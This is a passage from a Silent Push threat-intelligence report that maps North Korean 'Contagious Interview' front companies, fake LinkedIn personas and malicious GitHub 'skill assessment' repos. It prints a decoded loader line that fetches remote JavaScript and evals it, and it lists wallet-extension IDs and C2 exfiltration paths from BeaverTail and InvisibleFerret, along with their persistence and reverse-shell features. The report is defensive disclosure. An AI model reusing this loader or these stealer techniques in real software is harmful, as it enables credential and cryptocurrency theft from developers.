domain, including additional victim logs and an app.js file containing\r\nsimilar details to those found on other known infrastructure – “api[.]drive-release[.]cloud”.\r\nThe camdriversupport[.]com app.js file contained these email addresses:\r\ndesignedcuratedamy58@gmail[.]com (SENDER)\r\ndaisukeoikitsugu@gmail[.]com (RECIPIENT)\r\neliteengineer8523@gmail[.]com (AM)\r\nrockstar96954@gmail[.]com (RC)\r\nhundredup2023@gmail[.]com (TP)\r\nphoenixfire471@gmail[.]com (MM)\r\nawesomium430@gmail[.]com (AU)\r\nmaestro2819@gmail[.]com (SI)\r\nrodriguezjamesdaniel0807@gmail[.]com (SI)\r\nsatoshiyama14@gmail[.]com (ST)\r\nrichardkdavis45@gmail[.]com (AC)\r\nthedron101@gmail[.]com (CT)\r\nfairdev610@gmail[.]com (AT)\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 29 of 71\n\ntrevorgreer9312@gmail[.]com (JA)\r\nThe Trevor Greer persona has been heavily documented as being associated with the North Korean “Contagious\r\nInterview” threat actors.\r\napi.camdriversupport[.]com’s “app.js” configuration file\r\nWithin the victim file logs of camdriversupport[.]com, we discovered the following Astrill VPN IPs – Astrill VPN\r\nbeing the well-documented “VPN of choice” for many North Korean threat actors:\r\n155.94.255[.]2\r\n174.128.251[.]99\r\n194.33.45[.]162\r\n198.255.45[.]131\r\n199.115.99[.]34\r\n204.188.233[.]66\r\n208.115.228[.]234\r\n209.127.117[.]234\r\n23.106.161[.]1\r\n23.106.169[.]120\r\n38.170.181[.]10\r\n38.32.68[.]195\r\n45.86.208[.]162\r\n66.118.255[.]35\r\n70.32.3[.]15\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 30 of 71\n\n70.39.103[.]3\r\n70.39.70[.]194\r\n77.247.126[.]189\r\n91.239.130[.]102\r\nInvestigating BlockNovas’ GitHub Infrastructure\r\nHere, our team began searching for any GitHub content associated with “Blocknovas.” We quickly identified 17\r\nGitHub repositories that indicated they were for a “Blocknovas skill assessment,” a similar tactic to other\r\nmalicious lures, which we further detail below.\r\nOne GitHub user, “Bigrocks918” (hxxps://github[.]com/bigrocks918) contributed to 4 out of 17 skill assessments,\r\nas described below.\r\nhxxps://github[.]com/xorostar/blocknovas-llc-currency-converter-task\r\nWithin one of the BlockNovas skill assessments on GitHub, Silent Push analysts were able to discover an\r\nobfuscated backdoor located at:\r\n/backend/services/PaymentServices.js\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 31 of 71\n\nhxxps://github[.]com/mirzamudassir/blocknovas-nyx-public\r\nThe repository developers hid their malicious code by inserting numerous spaces before it so that it rendered off-screen. Below is an example as well as additional analysis of this script.\r\nHidden obfuscated malicious code from hxxps://github[.]com/mirzamudassir/blocknovas-nyx-public\r\nThrough an advanced search within GitHub, which is only available when logged in with an account, we\r\ndiscovered 8 total GitHub repos with the same code snippet.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 32 of 71\n\nhxxps://github[.]com/search?\r\nq=path%3Abackend%2Fservices%2F+content%3Aeval%28decodeURIComponent%28%27\u0026type=code\r\nIn total, we confirmed 9 GitHub repos spreading the backdoor:\r\n1. github[.]com/Collaborate3562/ncipher-backend\r\n2. github[.]com/Paragkoche/ncipher1.2upgrade-backend-2\r\n3. github[.]com/TopStar720/nyx4\r\n4. github[.]com/asimhafeezz/blacknovas-test\r\n5. github[.]com/hrjaffery/nyc-bitquery-whale-transactions\r\n6. github[.]com/krishprism1/ncipher1.2upgrade-backend\r\n7. github[.]com/SyedMinhalHasan/blocknovas-task\r\n8. github[.]com/artur-kolesnyk/NyxCipher-test\r\n9. github[.]com/xorostar/blocknovas-llc-currency-converter-task\r\nWe know GitHub does not index everything in search, and we were able to find 7 more repositories by searching\r\n“blocknovas” and “nyxcipher” that had the same obfuscated code:\r\n1. github.com/David-Odoh/Nyxcipher\r\n2. github.com/Ianstiefvater/blocknova\r\n3. github.com/PrimarchOrder/Blocknovas-LLC-Test\r\n4. github.com/Yasin-97/blocknovas-test\r\n5. github.com/lArtiquel/nyxcipher.ai\r\n6. github.com/mirzamudassir/blocknovas-nyx-public\r\n7. github.com/trishateh/blocknovas-task\r\nSince we knew various accounts were sharing this snippet of code, it was important to understand how it worked.\r\nBlockNovas Malware Analysis – Stage 1\r\nThe payload found within the numerous BlockNovas skill assessment GitHub repositories is a visually encoded\r\nstring with numerous “%” percent signs throughout the line of code.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 33 of 71\n\nUsing simple “URL Decode” recipes from a tool like CyberChef quickly cleaned up the text to expose the\r\npreviously seen domain “lianxinxiao[.]com”:\r\nCyberChef “URL Decode” recipe on the BlockNovas code payload found across GitHub\r\nThis is the final output after decoding the obfuscated code:\r\nfetch(eval(decodeURIComponent('\\'lianxinxiao[.]com:5000/tokenizer''))) .then(response =\u003e\r\nresponse.text()) .then(data =\u003e { eval(data); });\r\nThe code fetched JavaScript from a remote server on lianxinxiao[.]com and attempted to execute it, essentially\r\nallowing the server to run any code on the victim’s machine.\r\nBlockNovas Malware Analysis – Stage 2: BeaverTail Malware Confirmation\r\nThe request to lianxinxiao[.]com seen during Stage 1 led to a long and heavily obfuscated JavaScript payload:\r\nSilent Push Threat Analysts confirmed the JavaScript was obfuscated using the publicly available obfuscator\r\nfrom Preemptive: hxxps://www.preemptive[.]com/online-javascript-obfuscator/\r\nAfter deobfuscation and renaming some variables, our threat analysts found more than 500 lines of code that\r\naligned to known BeaverTail malware.\r\nAs seen with previous samples of the malware, this version of BeaverTail had several key functionalities related to\r\nstealing cryptocurrency.\r\nThe features include:\r\nDetermines browser paths based on the operating system\r\nThe malware collects sensitive data from popular Cryptocurrency Browser Extensions:\r\n“nkbihfbeogaeoehlfnkodbefgpgknn”, // MetaMask wallet Chrome extension\r\n“ejbalbakoplhglecddalleeaeenjim”, // MetaMask wallet Edge extension\r\n“hbjabdcbjhblacgcnapndodjp”, // BNB Chain wallet Chrome extension\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 34 of 71\n\n“hnfanknocefbdgdijnmhnfkndaad”, // Coinbase wallet Chrome extension\r\n“ibnejdfjmmpclnpebklmkoeihcooifec”, // TronLink wallet Extension\r\n“bfnaelmojmeihmhpjngjophjhpkljopa”, // Phantom wallet Chrome extension\r\n“hifafgmccecpkonpjkcfgodnhcellj”, // Crypto.com wallet Chrome extension\r\n“aphmhefpoccionboohckoenoemg” // Coin98 wallet Chrome extension\r\nSolana Wallet Credentials\r\nThe malware collects .ldb and .log files of those extensions.\r\nDepending on the operating system, the malware:\r\nCollects macOS Keychains\r\nCollects LinuxKeyrings\r\nCollected data is sent to the C2 via the domain seen many times:\r\nlianxinxiao[.]com:5000/uploads\r\nThe malware checks if it should execute the following steps by querying an endpoint every 10 minutes, for a total\r\nof 5 times:\r\nlianxinxiao[.]com:5000/check-running-spec/{hostname}\r\nIt is important to note that the malware requests this check with the specific hostname of the victim machine. This\r\nis likely a security mechanism that allows actors to explicitly allow or deny execution based on specific\r\nconditions.\r\nAdditionally, the malware downloads and extracts additional files needed to execute the main payload on\r\nWindows:\r\nlianxinxiao[.]com:5000/pdown\r\nAs well as on Linux and macOS:\r\nlianxinxiao[.]com:5000/libs\r\nOn all operating systems, if the prerequisites are accepted, it will then try to download and execute:\r\nlianxinxiao[.]com:5000/client/empOQO\r\nWhich is stored to: /.npl and then executed using Python.\r\nBlockNovas Malware Analysis – Stage 3: InvisibleFerret Main Stage\r\nOnce the prerequisites have been accepted in Stage 2 and the request is made to\r\nlianxinxiao[.]com:5000/client/empOQO, the infrastructure downloads an obfuscated BeaverTail payload named\r\n“main_empOQO.py” – which looks like:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 35 of 71\n\nThis payload utilized simple XOR encryption, which we could decrypt by taking the first 8 characters as a key to\r\ndecrypt the remaining string.\r\nThis led to the decrypted code:\r\nThe malware was InvisibleFerret, the payload malware commonly loaded by BeaverTail. However, this variant\r\nhad a twist: It contained persistence for all three major operating systems.\r\nThe encryption of the C2 was consistent with previous versions:\r\nWhich is base64 and translates to:\r\nhost2 = lianxinxiao.com:5000\r\nKey InvisibleFerret features from this sample included:\r\n1. Installs the Python request library if missing\r\n2. Checks if the C2 is up using\r\n1. lianxinxiao[.]com:5000/check-running\r\n3. The malware creates persistence on all major operating systems:\r\n1. Windows: Registry Run Key (pythonw.exe = no window !)\r\n2. Linux: Desktop entry in user autostart. Sets Hidden and NoDisplay to true. Enables autostart within\r\nGnome. Will execute whenever user logs in.\r\n3. MacOS: Create a LaunchAgent plist file in ~/Library/LaunchAgents/ . macOS automatically loads\r\nand executes these when user logs in. Stdin and stdout redirect to dev/null\r\n4. Main function:\r\n1. Downloads and executes:\r\n1. lianxinxiao[.]com:5000/payload/empOQO\r\n2. Execution is via subprocess.Popen\r\n3. MacOS/Darwin execution ends here!\r\n2. Downloads and executes:\r\n1. lianxinxiao[.]com:5000/brow/empOQO\r\n2. Execution is again via subprocess.Popen\r\nThe whole process described above only executed if the C2 server returned “true” when checked via\r\nlianxinxiao[.]com:5000/check-running\r\nBlockNovas Malware Analysis – Stage 4A: InvisibleFerret Payload Component\r\nThe request to “lianxinxiao[.]com:5000/payload/empOQO” seen in Stage 3 led to an encrypted payload:\r\nThe payload used the same encryption as Stage 3, leading to two additional code parts that were executed\r\nseparately.\r\nThe code encrypted in line 2 was decrypted and analyzed for functionality. Key functionalities of this code\r\nincluded:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 36 of 71\n\n1. Generates a UUID by using the device MAC address and the Username\r\n2. Gets the system Operating System (OS), OS release and exact version, the systems hostname and the\r\ncurrent username\r\n3. Gets user local IP Address\r\n4. Queries ip-api[.]com to get:\r\n1. User public IP\r\n2. User Latitude, Longtitude\r\n3. City\r\n4. Region/State\r\n5. Country\r\n6. ZIP/Postal code\r\n7. Timezone\r\n8. ISP\r\nThe data was then uploaded to the C2 server on the keys path with an exact timestamp:\r\nlianxinxiao[.]com:5000/keys\r\nContinuing to analyze the code encrypted in line 7 of the Stage 4A payload:\r\nt=\"DF90pw2dTi9...\r\nKey functionalities of this portion of the malware included:\r\nFor all operating systems:\r\n1. ReverseShell (Port: 5001)\r\n2. 8 defined commands:\r\n1. ssh_obj = Executes received commands and returns the output\r\n2. ssh_cmd = Sets a variable to “close”. Likely terminating either the connection or the script\r\n3. ssh_clip = Exfiltrates Keylogger/Clipboard log data\r\n4. ssh_run = Downloads and executes the browser stealer component (Stage 4b)\r\n5. ssh_upload = Multiple methods for file-exfiltration\r\n6. ssh_kill = Terminates Browser processes (chrome.exe, brave.exe, Google Chrome, Brave Browser)\r\n7. ssh_any = Initiates the AnyDesk backdoor\r\n8. ssh_env = Initiates the FileStealer\r\n3. File Stealer Targeting: Cryptocurrency Wallet data, Environment files, config files from coding projects,\r\ndocuments\r\n4. File-related functionalities seem to use an FTP Server to store exfiltrated data. This also applies to the\r\nKeylogger logs\r\nFor Windows-specific:\r\nKeylogger (with Window Title and Process ID logging)\r\nClipboard monitor\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 37 of 71\n\nBad Code Note: The actor seemed to have broken parts of this script’s functionality. Both the Any Desk\r\nbackdoor command and the Browser Stealer command expect a HOST and a PORT variable. However, the\r\nactor seemed to have changed the HOST and PORT variable names to HOST0 and PORT0 in the initialization\r\nphase of the script. As such, the commands should not execute successfully. Additionally, the previous stage\r\nalready downloads and executes the Browser stealer, making the command unnecessary.\r\nBlockNovas BeaverTail Malware Analysis – Stage 4B: InvisibleFerret Browser\r\nStealer Component\r\nWithin the malicious payloads from previous stages, one request was sent to\r\nlianxinxiao[.]com:5000/brow/empOQO\r\nThis was the “Browser Stealer” component of InvisibleFerret payloads:\r\nKey functionalities of the browser stealer after de-obfuscation included:\r\n1. Cross-Operating System “Browser Stealer” for Darwin/MacOS, Linux, and Windows\r\n2. Targets both stored credentials and stored Credit Card details\r\n3. Implements functionality for Chrome, Brave, Opera, Yandex, and MS Edge\r\n1. Yandex and Edge are only targeted on Windows\r\n4. Exfiltration via\r\n1. lianxinxiao[.]com:5000/keys\r\n5. Self-Deletion after execution or if the OS is not recognized\r\nNew lianxinxiao[.]com Panel Interface\r\nIn March 2025, Silent Push threat analysts discovered the lianxinxiao[.]com domain changed its login interface:\r\nlianxinxiao[.]com:5000 revealed a new interface\r\nWe were able to find an alternative path, “public/script[.]js,” in the HTML body, which revealed additional\r\nserver configurations, including the ability to configure Dropbox for the exfiltration of victim data.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 38 of 71\n\nWe found a different path via lianxinxiao[.]com:5000/public/scripts.js\r\nWithin the script.js, there was information found where the threat actor retrieved payloads through FTP:\r\nAlso found on lianxinxiao[.]com:5000/public/scripts.js was a reference to the domain “angeloperonline[.]online,”\r\nwhich was also seen on the mail.blocknova[.]com monitoring dashboard.\r\nThe infrastructure and malware payloads being served through this infrastructure continued to point back to this\r\nsame grouping of domains.\r\nBy investigating some of the employees of BlockNovas – with at least some of them likely being fake – we could\r\nthen connect the domains and front companies even more closely to the North Korean Contagious Interview\r\ncampaign.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 39 of 71\n\nAdditional BlockNovas “Skill Assessment” Websites, New Cloudflare Obfuscation\r\nOur team found additional BlockNovas “Skill Assessment” job application websites by searching for variations of\r\nthe “BlockNovas” brand name within different fields within Silent Push.\r\nWhile conducting diligence on this infrastructure mapping effort, we also searched Google for similar HTML\r\ntitles. We came across three domains hosting the same BlockNovas Skill Assessment Quiz.\r\nwonthegame[.]site\r\nxn--12c5eglc5bd7i[.]site\r\ninsomnianwin[.]site\r\nThe “xn--” in the domain mentioned above, “xn--12c5eglc5bd7i[.]site,” indicates it was written in Punycode. In\r\nsimple terms, Punycode was designed to address issues related to the internationalization of domain names\r\nbetween English and non-Latin languages, as well as emojis. Punycode addresses always start with the prefix “xn-\r\n-” followed by a series of letters and numbers.\r\nThe example below, when loaded into a browser, renders a visible URL in the Thai language that looks like: ลาส\r\nเวกัส[.]site and translates to “LasVegas[.]site”\r\nGoogle Search results for “insomnianwin[.]site”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 40 of 71\n\nGoogle Search results for “insomnianwin[.]site”\r\nRendition of the above Punycode for Google search results for “site:ลาสเวกัส[.]site”\r\nThe three domains and their similar versions were unique, but we believed BlockNovas likely owned them.\r\nBlockNovas Skill Assessment GitHub Pivots from MongoDB Lead to\r\n“OtterCookie” Malware on server[.]attisscmo[.]com\r\nSilent Push Threat Analysts continued to investigate the GitHub pivots into “Blocknovas skill assessment”\r\nrepositories.\r\nWe noticed that one of the 17 GitHub repos referenced BlockNovas – this one uploaded by a user with the handle\r\n“Collaborate3562” in a repo named “ncipher-backend” – configured a unique MongoDB URL within the key.js\r\nfile.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 41 of 71\n\nhxxps://github[.]com/Collaborate3562/ncipher-backend/blob/main/backend/config/key.js\r\nThe MongoDB URL contained unique credentials, subdomains, ports, and URL query strings – identical copies of\r\nthe string should only be found with associated projects.\r\nWhen searching on this specific MongoDB string within GitHub, we discovered 4 total repositories, which\r\nimmediately aligned to the “Contagious Interview” TTPs, being named:\r\nNYXCipher-test\r\nDapp-Backend-Test\r\nbitcoin\r\ninterview-preparation\r\nThe results showed that the first two led to BeaverTail malware with a known obfuscation scheme, but the third\r\n“bitcoin” repo was completely different from what we had previously described in this research and observed with\r\nthis campaign.\r\nWithin this repo, we found a “PaymentServices[.]js” file that contained similar obfuscated payloads “hidden” on\r\nthe first line by adding a large amount of whitespace, as seen in other BlockNovas repos.\r\nhxxps://github[.]com/Asrtothunder01/bitcoin/blob/main/backend/services/PaymentServices.js\r\nAfter de-obfuscation of this new JavaScript, which was actually the known OtterCookie malware, we were left\r\nwith a new C2 domain:\r\nserver[.]attisscmo[.]com.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 42 of 71\n\nDe-obfuscated code from\r\nhxxps://github[.]com/Asrtothunder01/bitcoin/blob/main/backend/services/PaymentServices.js\r\nAfter Silent Push Threat Analysts found the new domain (attisscmo[.]com) from the MongoDB pivot, we\r\nimmediately began investigating it for additional pivots.\r\nTo our surprise, we found a new panel named “Kryptoneer” with a pop-up when loading the domain referencing a\r\nseparate brand, “Suillama”:\r\nattisscmo[.]com\r\nThe site featured a “Connect Wallet” function, similar to those found on consumer-targeting websites, but with an\r\nadditional “Lock Token” feature, which is typically more commonly associated with an admin panel.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 43 of 71\n\nattisscmo[.]com was the new domain from the MongoDB pivot\r\nThe “Connect Wallet” feature included three legitimate crypto brands and attempted to connect to their Chrome\r\nextensions if the buttons were clicked:\r\nSuiet Wallet\r\nEthos Wallet\r\nSui Wallet\r\nThe “New to sui? Learn More Here” button led to the real support article (suiet[.]app/docs/getting-started) for the\r\ncrypto brand “Suiet,” which is a “self-custody wallet built on Sui blockchain.”\r\nThe attisscmo[.]com domain\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 44 of 71\n\nWithin the JavaScript for this website, there was a reference to the domains “Kryptoneer[.]com” and\r\n“suillama[.]com”\r\nThe site hxxps://attisscmo[.]com/static/js/main.3d770319.js referenced “Kryptoneer[.]com”\r\nThe site hxxps://attisscmo[.]com/static/js/main.3d770319.js referenced “suillama[.]com”\r\nIn December 2024, the Kryptoneer[.]com website was captured in the Wayback Machine, briefly hosting the\r\nHTML title “SUILLAMA”\r\nhxxps://web.archive[.]org/web/20241217214532/http://www.kryptoneer[.]com/\r\nThe domain “suillama[.]com” had the HTML title “Suillama | SUI’s First Permissionless Locker,” which provided\r\nmore context for the site’s potential purpose.\r\nSilent Push Web Scanner domain query link (datasource = [“webscan”] AND domain = “*suillama.com*”)\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 45 of 71\n\nWeb Scanner results for “*suillama[.]com”\r\nWe have not found similar site contents to be publicly reported, and there are some pivots from this into\r\npotentially unrelated infrastructure.\r\nWe believe it’s possible that North Korean threat actors have made additional efforts to target the Sui blockchain,\r\nor this domain may be used within job application processes as an example of the “crypto project” being worked\r\non.\r\nOur team will continue to investigate this lead for Kryptoneer/Sui Blockchain to confirm ties to any crypto initial\r\ncoin offerings or projects.\r\nThe Kryptoneer page does not appear to be a typical phishing page, but the code connections to other low-quality\r\ncrypto projects align with the “Contagious Interview” developers’ sloppy but aggressive methods.\r\nDuring our investigation of the attisscmo[.]com domain, our analysts discovered that lianxinxiao[.]com and\r\nattisscmo[.]com were the only sites observed to share the same output on port 8000—a “Decryption failed”\r\nresponse—which further strengthens the ties between this new domain and the primary BeaverTail domain,\r\nbesides the obfuscated code within their JS files and standard MongoDB strings found on GitHub.\r\nPort 8000 is a C2 port for the Golang Frostyferret Backdoor, as seen previously in this research.\r\nScreenshot showing the “Decryption failed” response on lianxinxiao[.]com\r\nScreenshot showing the “Decryption failed” response on attisscmo[.]com\r\nBlockNovas Employee Analysis \u0026 Pivots\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 46 of 71\n\nFrom this point forward, the report focuses on establishing concrete links across the network of Contagious\r\nInterview fronts, aliases, and fake/suspected fake employees. We provide additional information to support our\r\nclaims, findings, and recommendations, further substantiating our threat intelligence research.\r\nSilent Push Threat Analysts investigated BlockNovas’ employees due to the inclusion of real people being\r\nimpersonated on their “About Us” page.\r\nThe “Contagious Interview” threat actors regularly use fake LinkedIn accounts, and we quickly confirmed red\r\nflags with some of the BlockNovas employees.\r\nSome real people may be working for BlockNovas without realizing they are working for a North Korean front\r\ncompany, so we will only make profiles public when we can confirm they are fake.\r\nBlockNovas LinkedIn Employees\r\nBlockNovas LLC currently has 12 employees on LinkedIn. Additionally, individuals who have previously worked\r\nfor the company can be found through a LinkedIn search.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 47 of 71\n\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 48 of 71\n\nhxxps://www[.]/company/blocknovas/\r\nSuspected Fake Persona: Mehmet Demir\r\nThe first profile that stands out as fake is the “Backend Developer” Mehmet Demir.\r\nMehmet Demir hxxps://linkedin[.]com/in/mehmet-demir-godev Backend Developer | Golang,\r\nPython\r\nWhen viewing the profile photo, several signs indicate that the picture is AI-generated, including the cropping, the\r\nbridge of the nose, and random characters for the logo on the jacket, among others.\r\nInterestingly, Mehmet Demir indicates he has work experience with both “Blocknovas” and “Angeloper agency”\r\n– two organizations seen in the original BlockNovas Status and Monitoring Dashboard.\r\n“Angeloper agency” was confirmed to have a LinkedIn profile @\r\nhxxps://www.linkedin[.]com/company/angeloper-agency/ and their website @ angeloper[.]com\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 49 of 71\n\nMehmet Demir’s work experiences @ linkedin[.]com/in/mehmet-demir-godev\r\nMehmet Demir aka “Bigrocks918” Connected to Three Likely Contagious Interview Front\r\nCompanies: BlockNovas, Angeloper, and SoftGlide\r\nOur threat analysts began searching the internet for the name “Mehmet Demir” and quickly connected it to the\r\nsame domains previously associated with the Contagious Interview campaign.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 50 of 71\n\nWe found that Mehmet Demir is connected to the persona “Bigrock918” and all three organizations previously\r\nfound on the BlockNovas Status Dashboard: BlockNovas LLC, Softglide LLC, and Angeloper.\r\nIn October 2023, bigrocks918[.]com hosted a page with the HTML title, “Mehmet Demir Portfolio”:\r\nBigrocks918 making a commit with ‘Mehmet Demir Portfolio’ in the content\r\nhxxps://github[.]com/bigrocks918/hugo_portf_meh/commit/11b80699fbecea8df32df74b2dcd8046bda669bc\r\nGoogle search results for “bigrocks918” showing cached content on gitlab.blocknovas[.]com\r\nFurther parsing the “bigrocks918” GitHub account, one of the commits on Oct 11, 2023, revealed a Google\r\nAnalytics ID: “G-2GB0PPGPS1”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 51 of 71\n\ngoogleAnalitycsID “G-2GB0PPGPS1” via\r\nhxxps://github[.]com/bigrocks918/hugo_portf_meh/commit/be2ad1272fd48889f6bad1ef93c326ab3cde11d8\r\nThe “Bigrocks918” persona also committed code on GitHub to the “Softglide-landing” code for SoftGlide LLC.\r\nhxxps://github[.]com/bigrocks918/softglide-landing/commits/main/\r\nThe same “bigrocks918” GitHub user also had 7 files that reference “Angeloper” within their GitHub repos:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 52 of 71\n\nSearch: user:bigrocks918 angeloper\r\nhxxps://github[.]com/search?q=user%3Abigrocks918 angeloper\u0026type=code\r\nDigging deeper into the previously seen “angeloper[.]com” domain revealed that Angeloper[.]com also has a\r\nsubdomain configured at mehmetdemir.angeloper[.]com, which led to Mehmet Demir’s portfolio.\r\nmehmetdemir.angeloper[.]com\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 53 of 71\n\nContinuing our research into this persona, Silent Push Threat Analysts discovered another profile on dev[.]to for\r\n“Mehmet Demir” with the bigrocks918[.]com domain along with the description, “I have 7 years of experience in\r\ndeveloping, testing, and deploying web applications and microservices using Golang/Gin/Echo/Fiber,\r\nPython/Django, PHP/Laravel.”\r\nhxxps://dev[.]to/mehmetdemir\r\nWe also found Mehmet Demir and bigrocks918 within a thread on HuggingFace, a machine learning model-sharing company (screenshot below from January 30, 2024). It’s unclear if this was an attack lure or a legitimate\r\nquestion:\r\nhxxps://huggingface[.]co/state-spaces/mamba-2.8b/discussions/5\r\nWhat is noticeable in the profile picture on Huggingface is that a similar-looking face is being used for all the\r\nMehmet Demir profiles. It’s possible that a real photo was initially used to train the AI, allowing it to be inserted\r\ninto various backgrounds and perspectives while maintaining nearly the same appearance of the face.\r\nThe Huggingface profile also includes a photo of Mehmet at a festival or public location, which is likely created\r\nwith AI, like the other profile photos.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 54 of 71\n\nhxxps://huggingface[.]co/bigrocks918\r\nThe Mehmet Demir persona also has an account on guru[.]com where they state they were paid $220 from three\r\njobs, and two employers since July 2022.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 55 of 71\n\nhxxps://www.guru[.]com/freelancers/mehet-demir-full-stack-developer\r\nDemir posted feedback received from three employers on Guru[.]com: people named “John S. Mansfield” and\r\n“Robert Sheinbein” on unknown dates and a user “Anthony 1109” on October 12, 2023, who wrote, “good fast\r\nwork thx.”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 56 of 71\n\nhxxps://www.guru[.]com/freelancers/mehet-demir-full-stack-developer/reviews\r\nhxxps://www.guru[.]com/pro/employerhistory.aspx?compid=1379332\r\nOn the angeloper[.]com website, the “Talk with us” button links to a Calendly[.]com account for\r\n“bigrocks918geek” – further confirming ties between the brand and this persona:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 57 of 71\n\nangeloper[.]com referenced a calendly[.]com/bigrocks918geek/30min page\r\nWe discovered the domain angeloperonline[.]online was hosted on Stark Industries’ IP address, 95.164.33[.]66,\r\nwhich also has a URL found with the directory /pdown within VirusTotal data. This was a unique identifier for the\r\nBeaverTail malware. Additionally, port 5000 was found to have been reconfigured.\r\nSilent Push Threat Analysts believe that victims are lured through angeloper[.]com, and the malware is distributed\r\non angerloperonline[.]online.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 58 of 71\n\nVirustotal[.]com search of 95.164.33[.]66 revealed port 5000/pdown\r\nSoftGlide LLC Ties to Other Contagious Interview Infrastructure and Users\r\nOur analyst team previously connected SoftGlide[.]co to BlockNovas through the Status Dashboard and various\r\nGitHub accounts.\r\nThe domain markets itself as providing innovation for E-commerce, Blockchain, and Fintech.\r\nScreenshot of SoftGlide[.]co\r\nWe found one person who had been committing code to the BlockNovas GitHub and also followed the SoftGlide\r\nGitHub accounts with the handle “hades255” on GitHub.\r\nThis individual joined the BlockNovas LLC organization on GitHub in February 2025 and started making\r\ncontributions.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 59 of 71\n\nHades255 GitHub page overview hxxps://github[.]com/hades255?tab=overview\u0026from=2025-01-\r\n01\u0026to=2025-01-31\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 60 of 71\n\nHades255 GitHub contribution activity overview hxxps://github[.]com/hades255?\r\ntab=overview\u0026from=2025-01-01\u0026to=2025-01-31\r\nOur team recently confirmed that Hades255 is connected to the fake account of the CTO of BlockNovas, based on\r\na February 13, 2025, LinkedIn post announcing a project that was worked on, which linked to a\r\n“Hades255/varinder-instanavigation-laravel” repository on GitHub. Update: The screenshot connecting the two\r\nhas been removed for privacy reasons as the images were stolen from a real individual.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 61 of 71\n\nThe “hades255” GitHub account made its first contributions in 2015. During the first 2 years of the account, it was\r\nmerely committing on specific days to spell out “HADES” in commits. It’s possible that it was a purchased\r\naccount, as this is something occasionally done to incentivize sales.\r\nhxxps://github[.]com/hades255\r\nOur team also found that the GitHub profile Hades255 not only follows Blocknovas LLC, but also follows\r\nSoftGlide LLC. Update: A screenshot connecting the two has been removed for privacy reasons as the\r\nimages were stolen from a real individual.\r\nhxxps://github[.]com/orgs/SoftGlide-LLC/followers\r\nFurther, when checking the Hades255 repository named “portfolio-new,” we discovered a picture previously used\r\nby “Luis Carlos” on LinkedIn, who BlockNovas LLC employs.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 62 of 71\n\nHades255’s update for “Luis Carlos”\r\nLuis Carlos is a person we have seen working for BlockNovas LLC on LinkedIn:\r\nLinkedIn profile: linkedin[.]com/in/luis-lopeznoguera-colombia/en of BlockNovas LLC employee\r\nLuis Carlos\r\nOur researchers found that Luis Carlos also added stars four times to a project of Hades255, indicating a\r\nrelationship between the two users. Carlos is possibly one of the real people working for BlockNovas without\r\nrealizing his coworkers are North Koreans. Or it could be just a fake persona. His LinkedIn username is “luis-https://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 63 of 71\n\nlopeznoguera-colombia,” which is quite specific and differs from the other personas. However, the account is also\r\ncurrently “404ing” on LinkedIn, which means it has either been deleted or banned.\r\nhxxps://github[.]com/lopezluis00\r\nOne member named “thegoodearth918” (github[.]com/thegoodearth918) was found within the GitHub account\r\nfor “SoftGlide LLC” (github[.]com/SoftGlide-LLC) within their GitHub. What is interesting is that, again, we see\r\n“918” at the end of the username, just as we saw with bigrocks918.\r\nhxxps://github[.]com/thegoodearth918\r\nThe user “thegoodearth918” (github[.]com/thegoodearth918) also forked a repository named “Linkedin-skillassessments-quizzes” in August 2023 from another user, potentially using this to develop future skill\r\nassessment apps for Contagious Interview lures with job applicants.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 64 of 71\n\nhxxps://github[.]com/thegoodearth918\r\nAnother project from thegoodearth918 named “create-aviation” includes a “bigrocks.js” file which has the email\r\naddress bigrocks89@outlook[.]com by another GitHub account named Big-Rocks, which is now deleted. Big-Rocks is most likely the older account from bigrocks918 and thegoodearth918. The screenshot below reveals the\r\nemail bigrocks89@outlook[.]com:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 65 of 71\n\nhxxps://github[.]com/thegoodearth918/create-aviation/js/bigrocks.js\r\nThe email address “tsumin.work@gmail[.]com” was found within the thegoodearth918 GitHub profile. It’s\r\nunclear if this email is connected to Contagious Interview.\r\nCommit relationship between bigrocks918 